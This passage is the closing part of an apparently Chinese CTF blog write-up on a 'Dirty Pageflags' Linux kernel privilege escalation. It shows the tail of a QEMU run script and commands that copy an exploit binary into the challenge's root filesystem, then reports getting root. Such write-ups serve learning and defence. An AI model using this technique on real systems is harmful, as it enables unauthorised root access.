kaslr&quot;</span> \<br>    -no-reboot \<br>    -cpu qemu64,+smap,+smep \<br>    -monitor /dev/null<br><br><span class="hljs-built_in">rm</span> -f /tmp/flag.txt<br><span class="hljs-built_in">rm</span> -f /tmp/overlay.qcow2<br></code></pre></td></tr></table></figure>

<p><code>flag.txt</code>实际上在<code>/dev/sdb</code></p>
<p>使用下述方法挂载exp</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">sudo</span> <span class="hljs-built_in">mkdir</span> mnt<br><span class="hljs-built_in">sudo</span> mount rootfs.ext4 mnt<br><span class="hljs-built_in">sudo</span> <span class="hljs-built_in">cp</span> exp mnt<br><span class="hljs-built_in">sudo</span> umount mnt<br></code></pre></td></tr></table></figure>

<p>最后</p>
<p><strong>get root</strong></p>
<p><img src="/images/141.png" srcset="/img/loading.gif" lazyload alt="如图"></p>
<p>历时2天</p>
<p>终于完成了本篇blog</p>
<p>收获还是颇丰的吧…</p>
<p>感谢阅读…</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/Kernel/" class="category-chain-item">Kernel</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        
        
          <a href="/tags/kernel/" class="print-no-link">#kernel</a>
        
      
        
        
          <a href="/tags/pwn/" class="print-no-link">#pwn</a>
        
      
        
        
          <a href="/tags/PTE/" class="print-no-link">#PTE</a>
        
      
        
        
          <a href="/tags/Dirty-Pageflags/" class="print-no-link">#Dirty Pageflags</a>
        
      
        
        
          <a href="/tags/root/" class="print-no-link">#root</a>
        
      
        
        
          <a href="/tags/spray/" class="print-no-link">#spray</a>
        
      
        
        
          <a href="/tags/buddy-system/" class="print-no-link">#buddy system</a>
        
      
        
        
          <a href="/tags/slab/" class="print-no-link">#slab</a>
        
      
        
        
          <a href="/tags/cpu/" class="print-no-link">#cpu</a>
        
      
        
        
          <a href="/tags/etc-passwd/" class="print-no-link">#/etc/passwd</a>
        
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>Dirty Pageflags Kernel pwn</div>
      <div>https://rr00xxyy.github.io/2026/04/06/Dirty-Pageflags-Kernel-pwn/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>roxy</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2026年4月6日</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>更新于</div>
          <div>2026年4月16日</div>
        </div>
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2026/05/21/W4terCTF2026/" title="W4terCTF2026">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">W4terCTF2026</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2026/04/05/hello-kernel-pwn/" title="hello kernel pwn!">
                        <span class="hidden-mobile">hello kernel pwn!</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  


  
  









    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
      <span class="footer-quote">No furry, no life!</span>
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  
      <script>
        if (!window.MathJax) {
          window.MathJax = {
            tex    : {
              inlineMath: { '[+]': [['$', '$']] }
            },
            loader : {
              load: ['ui/lazy']
            },
            options: {
              renderActions: {
                insertedScript: [200, () => {
                  document.querySelectorAll('mjx-container').forEach(node => {
                    let target = node.parentNode;
                    if (target.nodeName.toLowerCase() === 'li') {
                      target.parentNode.classList.add('has-jax');
                    }
                  });
                }, '', false]
              }
            }
          };
        } else {
          MathJax.startup.document.state(0);
          MathJax.texReset();
          MathJax.typeset();
          MathJax.typesetPromise();
        }

        Fluid.events.registerRefreshCallback(function() {
          if ('MathJax' in window && MathJax.startup.document && typeof MathJax.startup.document.state === 'function') {
            MathJax.startup.document.state(0);
            MathJax.texReset();
            MathJax.typeset();
            MathJax.typesetPromise();
          }
        });
      </script>
    

  <script  src="https://lib.baomitu.com/mathjax/3.2.2/es5/tex-mml-chtml.js" ></script>

  <script  src="/js/local-search.js" ></script>




  
<script src="/js/mui-fluid.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
